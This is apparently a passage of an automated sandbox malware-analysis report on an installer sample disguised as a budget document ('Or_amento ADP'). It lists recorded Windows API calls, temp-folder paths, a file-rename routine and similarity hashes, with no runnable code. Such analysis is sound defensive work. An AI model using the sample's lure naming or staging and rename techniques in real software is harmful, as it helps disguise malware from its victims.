                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateInstance
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114\fusty
                                                                                                                                                                                                                          • API String ID: 542301482-3039840383
                                                                                                                                                                                                                          • Opcode ID: 2d60422b51706b5f8de98bdbfcbd79ecc62fd17b82eb2d48cb5e1808d9985389
                                                                                                                                                                                                                          • Instruction ID: c02b05589a316e099dfb0d7529d526a00835c5092bff723ddb1c3c0439b696db
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d60422b51706b5f8de98bdbfcbd79ecc62fd17b82eb2d48cb5e1808d9985389
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5412A71A00208AFCF00DFA4CD88AAD7BB6FF48314B24457AF515EB2D1DBB99A41CB54
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: p!C$p!C
                                                                                                                                                                                                                          • API String ID: 0-3125587631
                                                                                                                                                                                                                          • Opcode ID: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                                                                                                                                                                                          • Instruction ID: 15f69c865bc8d9ec0e9cf8060aa07673d574756af28658d99b75493111c5da86
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DC15831E042598BCF18CF68D4905EEB7B2FF99314F25826AD8567B380D7346A42CF95
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040280A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileFindFirst
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1974802433-0
                                                                                                                                                                                                                          • Opcode ID: a81ee3202ab0ebdc7edd9b8add70fe35bba4a5d97339da7cd4a9b36177af59e9
                                                                                                                                                                                                                          • Instruction ID: 34d4ac1ca0ba7345d9811ef03afe410f99a72e11e7e6ea98f315d3ade0c6d005
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a81ee3202ab0ebdc7edd9b8add70fe35bba4a5d97339da7cd4a9b36177af59e9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32F08C71A012149BDB01EBA4DE49AAEB378FF45324F20457BE105F21E1E7B89A409B29
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
                                                                                                                                                                                                                          • Instruction ID: c1774f2f946c4964f784778ac851d6f11cf56bcc8977249e4dfbf1b2b48c2d4a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2E17A71A0070ADFDB24CF58C880BAAB7F5EF45305F15892EE497A7291D738AA91CF14
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040434F
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404363
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404380
                                                                                                                                                                                                                          • GetSysColor.USER32(?), ref: 00404391
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040439F
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043AD
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 004043B2
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043BF
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D4
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,0000040A), ref: 0040442D
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000), ref: 00404434
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0040445F
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A2
                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004044B0
                                                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 004044B3
                                                                                                                                                                                                                          • ShellExecuteW.SHELL32(0000070B,open,00432E80,00000000,00000000,00000001), ref: 004044C8
                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 004044D4
                                                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 004044D7
                                                                                                                                                                                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404506
                                                                                                                                                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404518
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                                                                                                          • String ID: (B@$Call$N$open
                                                                                                                                                                                                                          • API String ID: 3615053054-1706805125
                                                                                                                                                                                                                          • Opcode ID: a63e6e2122d515d214c502fe3e454e68733c502862964fa3bbe4886b2a00d4bb
                                                                                                                                                                                                                          • Instruction ID: 98cd9110a96fdc90c980e8b88af1c06473e6a142e5aecddf25117f52f4c400a7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a63e6e2122d515d214c502fe3e454e68733c502862964fa3bbe4886b2a00d4bb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 217181B1900209BFDB109F60DD89AAA7B79FB84745F00803AF745B62D1C778AD51CFA8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                                                          • DrawTextW.USER32(00000000,Bistandspengene Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                          • String ID: Bistandspengene Setup$F
                                                                                                                                                                                                                          • API String ID: 941294808-2545038397
                                                                                                                                                                                                                          • Opcode ID: 2f348b4d91443a475dcd35d85824ce7e5a946905d26cbae13f88812008241038
                                                                                                                                                                                                                          • Instruction ID: 99fcf956b6c6492db4cb7183bc7c026c58e5ce6762c1973727186ff321cad974
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f348b4d91443a475dcd35d85824ce7e5a946905d26cbae13f88812008241038
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81418A71800209AFCF058F95DE459AFBBB9FF44315F04842EF991AA1A0C778EA54DFA4
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrcpyW.KERNEL32(004308E8,NUL), ref: 00405D8E
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,00405F12,?,?), ref: 00405DB2
                                                                                                                                                                                                                          • GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405DBB
                                                                                                                                                                                                                            • Part of subcall function 00405B8A: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9A
                                                                                                                                                                                                                            • Part of subcall function 00405B8A: lstrlenA.KERNEL32(00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BCC
                                                                                                                                                                                                                          • GetShortPathNameW.KERNEL32(004310E8,004310E8,00000400), ref: 00405DD8
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00405DF6
                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405E31
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E40
                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E78
                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(0040A558,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A558,00000000,[Rename],00000000,00000000,00000000), ref: 00405ECE
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00405EDF
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EE6
                                                                                                                                                                                                                            • Part of subcall function 00405C25: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe",00403536,?), ref: 00405C29
                                                                                                                                                                                                                            • Part of subcall function 00405C25: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe",00403536,?), ref: 00405C4B
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                                                                                                                                          • String ID: %ls=%ls$NUL$[Rename]
                                                                                                                                                                                                                          • API String ID: 222337774-899692902
                                                                                                                                                                                                                          • Opcode ID: 32b57ce3ca8940dfd53990341f9ef3c7080b2e07a05584e4532bbcc5854619bf
                                                                                                                                                                                                                          • Instruction ID: 0ee0d7f4969d0e8ff8498481139b35b4394cb67f0e1a7fb2b2bdcfef73d002b4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 32b57ce3ca8940dfd53990341f9ef3c7080b2e07a05584e4532bbcc5854619bf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 59310230200B147BD2207B619D49F6B3A6CDF45759F14003BBA85F62D2DA7C9E018EEC
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76533420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00406347
                                                                                                                                                                                                                          • CharNextW.USER32(?,?,?,00000000), ref: 00406356
                                                                                                                                                                                                                          • CharNextW.USER32(?,00000000,76533420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040635B
                                                                                                                                                                                                                          • CharPrevW.USER32(?,?,76533420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040636E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004062E5
                                                                                                                                                                                                                          • *?|<>/":, xrefs: 00406336
                                                                                                                                                                                                                          • "C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe", xrefs: 004062E4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                          • API String ID: 589700163-992309899
                                                                                                                                                                                                                          • Opcode ID: 7b766ee50bb8b1a0f4eab2cbe77ea87c6d078045d263edb3b82a780548374b37
                                                                                                                                                                                                                          • Instruction ID: 318300b0f17d4b51c4b24ffcfd5e9ca079934b39012f6efb3a6e40df4f12a45c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b766ee50bb8b1a0f4eab2cbe77ea87c6d078045d263edb3b82a780548374b37
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EF11B22680071695DB303B149C40AB7A2B8EF58790B56903FED8AB32C1F77C5C9286FD
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 00404198
                                                                                                                                                                                                                          • GetSysColor.USER32(00000000), ref: 004041B4
                                                                                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 004041C0
                                                                                                                                                                                                                          • SetBkMode.GDI32(?,?), ref: 004041CC
                                                                                                                                                                                                                          • GetSysColor.USER32(?), ref: 004041DF
                                                                                                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 004041EF
                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00404209
                                                                                                                                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 00404213
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
